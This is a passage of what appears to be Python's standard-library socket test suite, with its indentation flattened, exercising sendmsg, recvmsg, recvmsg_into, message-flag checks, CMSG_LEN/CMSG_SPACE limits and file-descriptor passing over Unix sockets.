elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
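    # Worked example of the rules above (flag values are platform-dependent,
    # so this is illustrative only): suppose msg_flags_common_unset includes
    # MSG_CTRUNC and msg_flags_eor_indicator is MSG_EOR. Then
    # checkFlags(flags, eor=True) requires MSG_EOR set and MSG_CTRUNC unset,
    # so flags == MSG_EOR passes while flags == MSG_EOR | MSG_CTRUNC fails
    # the final assertEqual.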
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
                # bpo-33937: the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
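    # Relationship these tests rely on (a sketch; exact values are
    # platform-specific): CMSG_LEN(n) is the cmsghdr size plus n payload
    # bytes with no trailing padding, while CMSG_SPACE(n) also pads to the
    # alignment required before a following cmsghdr, so where both macros
    # exist, CMSG_LEN(n) <= CMSG_SPACE(n) for any valid n.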
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
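    # Worked example of the truncation slice above (illustrative, assuming
    # 4-byte ints): with 9 bytes of cmsg_data, 9 % 4 == 1, so the slice
    # keeps only the first 8 bytes and frombytes() decodes exactly two
    # complete descriptors, silently dropping the truncated third.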
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
